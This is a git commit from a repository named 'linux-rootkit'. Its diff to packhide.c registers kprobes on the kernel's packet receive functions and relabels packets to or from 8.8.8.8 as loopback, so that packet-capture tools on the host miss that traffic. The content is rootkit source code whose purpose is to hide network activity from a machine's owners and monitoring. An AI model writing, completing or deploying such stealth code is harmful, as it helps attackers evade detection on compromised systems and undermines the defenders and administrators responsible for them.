linux-rootkit

commit 5f0df8508a9b63b77b6bb4639e0f231cb4e8c66e
parent c45a81a489875aa5c81af386ed1973d58b0fd8e4
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 19 Dec 2020 22:20:22 +0100

Preview of packet hiding

Diffstat:
M
src/packhide.c
 | 
50
++++++++++++++++++++++----------------------------

1 file changed, 22 insertions(+), 28 deletions(-)
diff --git a/src/packhide.c b/src/packhide.c
@@ -1,14 +1,15 @@
 #include <linux/kernel.h>
 #include <linux/kprobes.h>
 #include <linux/skbuff.h>
+#include <linux/netdevice.h>
 #include <uapi/linux/if_packet.h>
+#include <uapi/linux/ip.h>
+#include <uapi/linux/ipv6.h>
 
 #include "common.h"
 #include "hook.h"
 
 static int g7_packet_rcv(struct kprobe *, struct pt_regs *);
-static int g7_tpacket_rcv(struct kprobe *, struct pt_regs *);
-static int g7_packet_rcv_spkt(struct kprobe *, struct pt_regs *);
 static int g7_fault(struct kprobe *, struct pt_regs *, int);
 static void g7_post(struct kprobe *, struct pt_regs *m, unsigned long);
 
@@ -32,19 +33,22 @@ hide_packets(void)
     p_rcv.post_handler = g7_post;
     p_rcv.fault_handler = g7_fault;
 
-    tp_rcv.pre_handler = g7_tpacket_rcv;
+    tp_rcv.pre_handler = g7_packet_rcv;
     tp_rcv.post_handler = g7_post;
     tp_rcv.fault_handler = g7_fault;
 
-    p_rcv_spkt.pre_handler = g7_packet_rcv_spkt;
+    p_rcv_spkt.pre_handler = g7_packet_rcv;
     p_rcv_spkt.post_handler = g7_post;
     p_rcv_spkt.fault_handler = g7_fault;
 
-    if(register_kprobe(&p_rcv))
+    if (register_kprobe(&p_rcv))
         DEBUG_INFO("[g7] Could not insert kprobe p_rcv\n");
-
-    if(register_kprobe(&tp_rcv))
+    
+    if (register_kprobe(&tp_rcv))
         DEBUG_INFO("[g7] Could not insert kprobe tp_rcv\n");
+    
+    if (register_kprobe(&p_rcv_spkt))
+        DEBUG_INFO("[g7] Could not insert kprobe p_rcv_spkt\n");
 }
 
 void
@@ -61,29 +65,19 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
     struct sk_buff *skb;
     skb = (struct sk_buff *)pt_regs->di;
 
-    skb->pkt_type = PACKET_LOOPBACK;
-    
-
-    return 0;
-}
+    char *data = skb_network_header(skb);
+    char ver = data[0];
 
-static int
-g7_tpacket_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
-{
-    struct sk_buff *skb;
-    skb = (struct sk_buff *)pt_regs->di;
-
-    skb->pkt_type = PACKET_LOOPBACK;
-
-    return 0;
-}
-
-static int g7_packet_rcv_spkt(struct kprobe *kp, struct pt_regs *pt_regs)
-{
-    struct sk_buff *skb;
-    skb = (struct sk_buff *)pt_regs->di;
+    if ((ver & 0x40)) {
+        struct iphdr *iphdr;
+        struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
 
-    skb->pkt_type = PACKET_LOOPBACK;
+        pt_regs->di = (long unsigned int)clone;
+        iphdr = (struct iphdr *)skb_network_header(clone);
+        
+        if (iphdr->saddr == 0x08080808 || iphdr->daddr == 0x08080808)
+            clone->pkt_type = PACKET_LOOPBACK;
+    }
 
     return 0;
 }